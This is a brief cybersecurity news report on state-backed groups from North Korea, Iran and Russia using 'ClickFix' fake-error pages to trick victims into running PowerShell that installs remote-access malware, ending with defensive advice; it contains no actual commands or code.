According to fresh intelligence from Proofpoint and Microsoft, a new wave of sophisticated cyber-espionage campaigns is leveraging a deceptive social engineering tactic known as ClickFix.

Advanced persistent threat (APT) groups from North Korea, Iran, and Russia are all adopting the technique.

ClickFix attacks typically impersonate legitimate platforms like Google Drive or Microsoft Office, using phishing or malvertising to lure targets to malicious websites. Victims are presented with fake error messages claiming a download or document failed, prompting them to click a “Fix” button. This leads to manual execution of PowerShell or command-line scripts, which silently install malware or backdoors onto the victim’s device.


Among the groups using ClickFix is Kimsuky, a North Korean APT, which Microsoft linked to fake “device registration” pages. Between January and February 2025, Kimsuky targeted think tanks with phishing emails impersonating Japanese diplomats. Once trust was established, targets were tricked into copying PowerShell commands that deployed QuasarRAT and scheduled persistence tasks, showing a decoy PDF.

Meanwhile, Iranian group MuddyWater targeted 39 Middle Eastern organizations in November 2024 using spoofed Microsoft alerts. The emails tricked recipients into running PowerShell as admin, infecting systems with ‘Level,’ a remote monitoring tool aiding espionage efforts. Similarly, Russian actors UNK_RemoteRogue and APT28 used ClickFix in late 2024, spoofing Microsoft Word and Google services to install malware via Empire C2 and Metasploit.

ClickFix’s growing adoption across state-backed APTs underscores its effectiveness—and the danger of copying unfamiliar commands from web prompts. Cybersecurity experts urge users to exercise caution and avoid executing unsolicited scripts, especially with administrative privileges.

READ
DNA Sequencing May Become Prime Target for Hackers, Warns Study